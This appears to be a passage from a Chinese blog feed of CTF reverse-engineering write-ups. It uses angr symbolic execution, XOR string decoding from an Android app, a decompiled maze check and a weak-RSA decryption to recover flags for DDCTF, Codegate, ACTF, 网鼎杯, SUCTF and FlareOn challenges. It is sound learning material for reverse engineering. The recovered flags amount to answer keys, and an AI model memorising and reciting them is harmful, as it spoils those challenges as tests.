class="number">5</span>, -<span class="number">49</span>, -<span class="number">26</span>, <span class="number">79</span>, -<span class="number">70</span>, -<span class="number">26</span>, -<span class="number">81</span>, <span class="number">120</span>, <span class="number">25</span>, <span class="number">111</span>, -<span class="number">100</span>, -<span class="number">23</span>, -<span class="number">9</span>, <span class="number">122</span>, -<span class="number">35</span>, <span class="number">66</span>, -<span class="number">50</span>, -<span class="number">116</span>, <span class="number">3</span>, -<span class="number">72</span>, <span class="number">102</span>, -<span class="number">45</span>, -<span class="number">85</span>, <span class="number">0</span>, <span class="number">126</span>, -<span class="number">34</span>, <span class="number">62</span>, <span class="number">83</span>, -<span class="number">34</span>, <span class="number">48</span>, -<span class="number">111</span>, <span class="number">61</span>, -<span class="number">9</span>, -<span class="number">51</span>, <span class="number">114</span>, <span class="number">20</span>, <span class="number">81</span>, -<span class="number">126</span>, -<span class="number">18</span>, <span class="number">27</span>, -<span class="number">115</span>, -<span class="number">76</span>, -<span class="number">116</span>, -<span class="number">48</span>, -<span class="number">118</span>, -<span class="number">10</span>, -<span class="number">102</span>, -<span class="number">106</span>, <span class="number">113</span>, -<span class="number">104</span>, <span class="number">98</span>, -<span class="number">109</span>, <span class="number">74</span>, <span class="number">48</span>, <span class="number">47</span>, -<span class="number">100</span>, -<span class="number">88</span>, <span class="number">121</span>, <span class="number">22</span>, -<span class="number">63</span>, -<span class="number">32</span>, -<span class="number">20</span>, -<span class="number">41</span>, -<span class="number">27</span>, -<span class="number">20</span>, -<span class="number">118</span>, <span class="number">100</span>, -<span class="number">76</span>, <span class="number">70</span>, -<span class="number">49</span>, -<span class="number">39</span>, -<span class="number">27</span>, -<span class="number">106</span>, -<span class="number">13</span>, -<span class="number">108</span>, <span class="number">115</span>, -<span class="number">87</span>, -<span class="number">1</span>, -<span class="number">22</span>, -<span class="number">53</span>, <span class="number">21</span>, -<span class="number">100</span>, <span class="number">124</span>, -<span class="number">95</span>, -<span class="number">40</span>, <span class="number">62</span>, -<span class="number">69</span>, <span class="number">29</span>, <span class="number">56</span>, -<span class="number">53</span>, <span class="number">85</span>, -<span class="number">48</span>, <span class="number">25</span>, <span class="number">37</span>, -<span class="number">78</span>, <span class="number">11</span>, -<span class="number">110</span>, -<span class="number">24</span>, -<span class="number">120</span>, -<span class="number">82</span>, <span class="number">6</span>, -<span class="number">94</span>, -<span class="number">101</span> };</span><br><span class="line"> <span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">final</span> <span class="keyword">byte</span>[] q = { -<span class="number">57</span>, -<span class="number">90</span>, <span class="number">53</span>, -<span class="number">71</span>, -<span class="number">117</span>, <span class="number">98</span>, <span class="number">62</span>, <span class="number">98</span>, <span class="number">101</span>, -<span class="number">96</span>, <span class="number">36</span>, <span class="number">110</span>, <span class="number">77</span>, -<span class="number">83</span>, -<span class="number">121</span>, <span class="number">2</span>, -<span class="number">48</span>, <span class="number">94</span>, -<span class="number">106</span>, -<span class="number">56</span>, -<span class="number">49</span>, -<span class="number">80</span>, -<span class="number">1</span>, <span class="number">83</span>, <span class="number">75</span>, <span class="number">66</span>, -<span class="number">44</span>, <span class="number">74</span>, <span class="number">2</span>, -<span class="number">36</span>, -<span class="number">42</span>, -<span class="number">103</span>, <span class="number">6</span>, -<span class="number">115</span>, -<span class="number">40</span>, <span class="number">69</span>, -<span class="number">107</span>, <span class="number">85</span>, -<span class="number">78</span>, -<span class="number">49</span>, <span class="number">54</span>, <span class="number">78</span>, -<span class="number">26</span>, <span class="number">15</span>, <span class="number">98</span>, -<span class="number">70</span>, <span class="number">8</span>, -<span class="number">90</span>, <span class="number">94</span>, -<span class="number">61</span>, -<span class="number">84</span>, <span class="number">64</span>, <span class="number">112</span>, <span class="number">51</span>, -<span class="number">29</span>, -<span class="number">34</span>, <span class="number">126</span>, -<span class="number">21</span>, -<span class="number">126</span>, -<span class="number">71</span>, -<span class="number">31</span>, -<span class="number">24</span>, -<span class="number">60</span>, -<span class="number">2</span>, -<span class="number">81</span>, <span class="number">66</span>, -<span class="number">84</span>, <span class="number">85</span>, -<span class="number">91</span>, <span class="number">10</span>, <span class="number">84</span>, <span class="number">70</span>, -<span class="number">8</span>, -<span class="number">63</span>, <span class="number">26</span>, <span class="number">126</span>, -<span class="number">76</span>, -<span class="number">104</span>, -<span class="number">123</span>, -<span class="number">71</span>, -<span class="number">126</span>, -<span class="number">62</span>, -<span class="number">23</span>, <span class="number">11</span>, -<span class="number">39</span>, <span class="number">70</span>, <span class="number">14</span>, <span class="number">59</span>, -<span class="number">101</span>, -<span class="number">39</span>, -<span class="number">124</span>, <span class="number">91</span>, -<span class="number">109</span>, <span class="number">102</span>, -<span class="number">49</span>, <span class="number">21</span>, <span class="number">105</span>, <span class="number">0</span>, <span class="number">37</span>, -<span class="number">128</span>, -<span class="number">57</span>, <span class="number">117</span>, <span class="number">110</span>, -<span class="number">115</span>, -<span class="number">86</span>, <span class="number">56</span>, <span class="number">25</span>, -<span class="number">46</span>, -<span class="number">55</span>, <span class="number">7</span>, -<span class="number">125</span>, <span class="number">109</span>, <span class="number">76</span>, <span class="number">104</span>, -<span class="number">15</span>, <span class="number">82</span>, -<span class="number">53</span>, <span class="number">18</span>, -<span class="number">28</span>, -<span class="number">24</span> };</span><br><span class="line"> <span class="keyword">private</span> TextView n;</span><br><span class="line"> <span class="keyword">private</span> TextView o;</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">private</span> String <span class="title">i</span><span class="params">()</span></span></span><br><span class="line"><span class="function"> </span>{</span><br><span class="line"> <span class="keyword">int</span> i = <span class="number">0</span>;</span><br><span class="line"> <span class="keyword">byte</span>[] arrayOfByte1 = <span class="keyword">new</span> <span class="keyword">byte</span>[p.length];</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> j = <span class="number">0</span>; j < arrayOfByte1.length; j++)</span><br><span class="line"> arrayOfByte1[j] = (<span class="keyword">byte</span>)(p[j] ^ q[j]);</span><br><span class="line"> <span class="keyword">int</span> k = arrayOfByte1[<span class="number">0</span>];</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> i1 = <span class="number">0</span>; arrayOfByte1[(k + i1)] != <span class="number">0</span>; i1++);</span><br><span class="line"> <span class="keyword">byte</span>[] arrayOfByte2 = <span class="keyword">new</span> <span class="keyword">byte</span>[i1];</span><br><span class="line"> <span class="keyword">while</span> (i < i1)</span><br><span class="line"> {</span><br><span class="line"> arrayOfByte2[i] = arrayOfByte1[(k + i)];</span><br><span class="line"> i++;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">new</span> String(arrayOfByte2);</span><br><span class="line"> }</span><br></pre></td></tr></table></figure><p>我们按照它给的逻辑分别算出</p><blockquote><p>arrayOfByte2=”<a href="mailto:DDCTF-3ad60811d87c4a2dba0ef651b2d93476@didichuxing.com">DDCTF-3ad60811d87c4a2dba0ef651b2d93476@didichuxing.com</a>“</p><p>flag{[email protected]}</p></blockquote><h3 id="WELCOME-TO-JNI"><a href="#WELCOME-TO-JNI" class="headerlink" title="WELCOME TO JNI"></a>WELCOME TO JNI</h3><blockquote><p>JNI 全称 Java Native Interface,Java 本地化接口,可以通过 JNI 调用系统提供的 API。操作系统,无论是 Linux,Windows 还是 Mac OS,或者一些汇编语言写的底层硬件驱动都是 C/C++ 写的。<strong>Java和C/C++不同 ,它不会直接编译成平台机器码,而是编译成虚拟机可以运行的Java字节码的.class文件</strong>,通过JIT技术即时编译成本地机器码,所以有效率就比不上C/C++代码,JNI技术就解决了这一痛点,<strong>JNI 可以说是 C 语言和 Java 语言交流的适配器、中间件</strong>。</p></blockquote><p>总而言之,我们现在还是要搞这个<code>apk</code>嘛~</p><p>先找到入口点,然后<code>jd-gui</code>看一下:<img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week5/image-20210203021650803.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week5/image-20210203021650803.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20210203021650803"></p><p>根据图中逻辑,我们现在要去<code>native-lib</code>中寻找<code>loginUtils</code>:<img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week5/image-20210203021810335.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week5/image-20210203021810335.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20210203021810335"></p><h3 id="Codegate-CTF-Redvelvet"><a href="#Codegate-CTF-Redvelvet" class="headerlink" title="Codegate CTF Redvelvet"></a>Codegate CTF Redvelvet</h3><p>根据提示内容,我们要用<code>angr</code>解题,在<code>IDA64</code>里面不难看出我们要<code>find 0x4015F2</code>(最后输出结果的位置),<code>avoid 0x401621</code>:<img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week5/image-20210203022303166.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week5/image-20210203022303166.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20210203022303166"></p><p>为了提高<code>angr</code>的速度和正确率,我们直接把<code>exit</code>函数设置为<code>avoid</code>:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> angr</span><br><span class="line">p = angr.Project(<span class="string">"./RedVelvet"</span>,load_options={<span class="string">"auto_load_libs"</span>: <span class="literal">False</span>})</span><br><span class="line">sta = p.factory.entry_state()</span><br><span class="line">sim = p.factory.simulation_manager(sta)</span><br><span class="line">sim.explore(find=<span class="number">0x4015f2</span>,avoid=[<span class="number">0x4007D0</span>])</span><br><span class="line">print(sim.found[<span class="number">0</span>].posix.dumps(<span class="number">0</span>))</span><br><span class="line"><span class="string">'''</span></span><br><span class="line"><span class="string">Traceback (most recent call last):</span></span><br><span class="line"><span class="string"> File "exp.py", line 6, in <module></span></span><br><span class="line"><span class="string"> print(sim.found[0].posix.dumps(0))</span></span><br><span class="line"><span class="string">IndexError: list index out of range</span></span><br><span class="line"><span class="string">'''</span></span><br></pre></td></tr></table></figure><p>嗯????为什么没有答案呢???我去问了一下万能的<code>Rx</code>神,他是这么给我解释的(大意):最后一个加密的函数是<code>SHA256</code>,而众所周知<code>SHA256</code>是不可逆算法,所以z3是跑不出结果的。但是在跑到<code>SHA256</code>的时候它的输入内容相当于已经确定了,所以我们把<code>find</code>定位在它进入<code>SHA256</code>的时候,也就是<code>0x40152d</code>:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> angr</span><br><span class="line">p = angr.Project(<span class="string">"./RedVelvet"</span>,load_options={<span class="string">"auto_load_libs"</span>: <span class="literal">False</span>})</span><br><span class="line">sta = p.factory.entry_state()</span><br><span class="line">sim = p.factory.simulation_manager(sta)</span><br><span class="line">sim.explore(find=<span class="number">0x40152d</span>,avoid=[<span class="number">0x4007D0</span>])</span><br><span class="line">print(sim.found[<span class="number">0</span>].posix.dumps(<span class="number">0</span>))</span><br><span class="line"><span class="comment">#flag{What_You_Wanna_Be?:)_l`_la}</span></span><br></pre></td></tr></table></figure><p>插一个题外话,我用<code>wsl</code>貌似才<code>4mins</code>左右……</p>]]></content>
<categories>
<category> CTF学习笔记 </category>
</categories>
<tags>
<tag> CTF </tag>
<tag> RE </tag>
</tags>
</entry>
<entry>
<title>Re学习之RX引路_week4</title>
<link href="2021/02/23/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week4/"/>
<url>2021/02/23/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week4/</url>
<content type="html"><![CDATA[<h3 id="DMCTF2020-re3"><a href="#DMCTF2020-re3" class="headerlink" title="DMCTF2020 re3"></a>DMCTF2020 re3</h3><p>根据提示,用PEid和IDA的Findcrypt插件,发现big number:<code>21232f297a57a5a743894a0e4a801fc3</code>这么一长串数字,要么<code>RSA</code>,要么散列函数,但这个程序明显不是RSA,直接cmd5挨个试一遍,是md5加密,解出来是admin</p><h3 id="ACTF2020-Oruga"><a href="#ACTF2020-Oruga" class="headerlink" title="ACTF2020 Oruga"></a>ACTF2020 Oruga</h3><p>明显地图题目,主函数先检查<code>flag</code>格式,然后再做处理。</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">_BOOL8 __fastcall <span class="title">sub_78A</span><span class="params">(<span class="keyword">char</span> *a1)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">int</span> v2; <span class="comment">// [rsp+Ch] [rbp-Ch]</span></span><br><span class="line"> <span class="keyword">int</span> v3; <span class="comment">// [rsp+10h] [rbp-8h]</span></span><br><span class="line"> <span class="keyword">int</span> v4; <span class="comment">// [rsp+14h] [rbp-4h]</span></span><br><span class="line"></span><br><span class="line"> v2 = <span class="number">0</span>;</span><br><span class="line"> v3 = <span class="number">5</span>;</span><br><span class="line"> v4 = <span class="number">0</span>;</span><br><span class="line"> <span class="keyword">while</span> ( <span class="built_in">map</span>[v2] != <span class="string">'!'</span> )</span><br><span class="line"> {</span><br><span class="line"> v2 -= v4;</span><br><span class="line"> <span class="keyword">if</span> ( a1[v3] != <span class="string">'W'</span> || v4 == <span class="number">-16</span> ) <span class="comment">// up</span></span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">if</span> ( a1[v3] != <span class="string">'E'</span> || v4 == <span class="number">1</span> ) <span class="comment">// right</span></span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">if</span> ( a1[v3] != <span class="string">'M'</span> || v4 == <span class="number">16</span> ) <span class="comment">// down</span></span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">if</span> ( a1[v3] != <span class="string">'J'</span> || v4 == <span class="number">-1</span> ) <span class="comment">// left</span></span><br><span class="line"> <span class="keyword">return</span> <span class="number">0LL</span>;</span><br><span class="line"> v4 = <span class="number">-1</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> v4 = <span class="number">16</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> v4 = <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> v4 = <span class="number">-16</span>;</span><br><span class="line"> }</span><br><span class="line"> ++v3;</span><br><span class="line"> <span class="keyword">while</span> ( !<span class="built_in">map</span>[v2] )</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">if</span> ( v4 == <span class="number">-1</span> && (v2 & <span class="number">0xF</span>) == <span class="number">0</span> )</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0LL</span>;</span><br><span class="line"> <span class="keyword">if</span> ( v4 == <span class="number">1</span> && v2 % <span class="number">16</span> == <span class="number">15</span> )</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0LL</span>;</span><br><span class="line"> <span class="keyword">if</span> ( v4 == <span class="number">16</span> && (<span class="keyword">unsigned</span> <span class="keyword">int</span>)(v2 - <span class="number">240</span>) <= <span class="number">0xF</span> )</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0LL</span>;</span><br><span class="line"> <span class="keyword">if</span> ( v4 == <span class="number">-16</span> && (<span class="keyword">unsigned</span> <span class="keyword">int</span>)(v2 + <span class="number">15</span>) <= <span class="number">0x1E</span> )</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0LL</span>;</span><br><span class="line"> v2 += v4;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> a1[v3] == <span class="string">'}'</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>规则是:</p><ul><li>起点是第一个字符</li><li>方向对应字母</li><li>一个方向一直走,走到障碍换方向,走到边界直接退出</li></ul><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week4/image-20210122103044369.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week4/image-20210122103044369.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII="></p><blockquote><p>flag{MEWEMEWJMEWJM}</p></blockquote><h3 id="网鼎杯2020-signal"><a href="#网鼎杯2020-signal" class="headerlink" title="网鼎杯2020 signal"></a>网鼎杯2020 signal</h3><p>哎~该学的迟早要学……之前打moe的时候就有让学这个玩意,但是真的懒啊,不想学……现在就得学了。稍微会一点点一点点<code>angr</code>,这个题就很简单,直接贴代码吧:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> angr</span><br><span class="line">p = angr.Project(<span class="string">"./signal.exe"</span>,auto_load_libs=<span class="literal">False</span>)</span><br><span class="line">sta = p.factory.entry_state()</span><br><span class="line">sim = p.factory.simulation_manager(sta)</span><br><span class="line">sim.explore(find = <span class="number">0x40175E</span>)</span><br><span class="line">print(sim.found[<span class="number">0</span>].posix.dumps(<span class="number">0</span>))</span><br><span class="line"><span class="comment"># 757515121f3d478</span></span><br></pre></td></tr></table></figure><p>也可以用<code>Ponce</code>做,但是我这里试了好几遍不知道为啥,只能搞出来前13位……</p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week4/image-20210123022450468.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week4/image-20210123022450468.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20210123022450468"></p>]]></content>
<categories>
<category> CTF学习笔记 </category>
</categories>
<tags>
<tag> CTF </tag>
<tag> RE </tag>
</tags>
</entry>
<entry>
<title>Re学习之RX引路_week3</title>
<link href="2021/02/23/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/"/>
<url>2021/02/23/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/</url>
<content type="html"><![CDATA[<h3 id="SUCTF2019-Signin"><a href="#SUCTF2019-Signin" class="headerlink" title="SUCTF2019 Signin"></a>SUCTF2019 Signin</h3><p><code>DIE</code>查一下:<code>ELF64</code>,<code>IDA</code>打开,没扣符号表,你🐎有了。</p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/image-20210112210814599.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/image-20210112210814599.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20210112210814599"></p><p><code>gmpz</code>……好眼熟……对了!<code>python</code>里面有一个库叫做<code>gmpy</code>,盲猜这个库是支持高精度的一个库。根据<code>__gmpz_powm</code>不难猜出这应该是一个<code>RSA</code>:</p><blockquote><p>N = 103461035900816914121390101299049044413950405173712170434161686539878160984549 </p><p>c = 0xad939ff59f6e70bcbfad406f2494993757eee98b91bc244184a377520d06fc35 </p><p>e = 65537</p></blockquote><p>分解<code>N</code>:<img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/image-20210112231431881.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/image-20210112231431881.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20210112231431881"></p><p><code>python</code>脚本:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> gmpy2</span><br><span class="line"></span><br><span class="line">p = <span class="number">366669102002966856876605669837014229419</span></span><br><span class="line">q = <span class="number">282164587459512124844245113950593348271</span></span><br><span class="line">N = <span class="number">103461035900816914121390101299049044413950405173712170434161686539878160984549</span></span><br><span class="line">c = <span class="number">0xad939ff59f6e70bcbfad406f2494993757eee98b91bc244184a377520d06fc35</span></span><br><span class="line">e = <span class="number">65537</span></span><br><span class="line"></span><br><span class="line">d = gmpy2.invert(e,(p-<span class="number">1</span>)*(q-<span class="number">1</span>))</span><br><span class="line">m = gmpy2.powmod(c,d,p*q)</span><br><span class="line"></span><br><span class="line">print(<span class="built_in">hex</span>(m))</span><br><span class="line"><span class="comment"># 0x73756374667b50776e5f405f68756e647265645f79656172737d</span></span><br></pre></td></tr></table></figure><p>然后十六进制转字符:</p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/image-20210112232356996.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/image-20210112232356996.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20210112232356996"></p><h3 id="FlareOn6-Overlang"><a href="#FlareOn6-Overlang" class="headerlink" title="FlareOn6 Overlang"></a>FlareOn6 Overlang</h3><p>打开文件夹,有一个提示信息:</p><blockquote><p>The secret of this next challenge is cleverly hidden. However, with the right approach, finding the solution will not take an <b>overlong</b> amount of time.</p><p>Hint:本题解出相应字符串请用flag{}包裹,形如:flag{[email protected]}。</p></blockquote><p>大意就是:这个题很奇葩,要有方法……</p><p>那先按照常规思路,<code>IDA</code>打开,<code>woc</code>,好少:</p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/image-20210113204027449.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/image-20210113204027449.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20210113204027449"></p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/image-20210113204208555.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/image-20210113204208555.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20210113204208555"></p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/image-20210113204225858.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/image-20210113204225858.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20210113204225858"></p><p>看完了……<code>emmmmm</code>……没什么想法……</p><p>倒是有类似于加密算法的地方,,但是总感觉一堆位运算不是让你去逆的……</p><p>我们找一找奇怪的点……</p><p>在调用<code>sub_401160</code>函数的时候,第三个参数是<code>0x1C</code>,但是阅读<code>sub_401160</code>函数,第三个参数应该是第二个参数的长度,第二个参数的长度是<code>0xAF</code>,再结合运行弹窗:</p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/image-20210113204849438.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/image-20210113204849438.png" 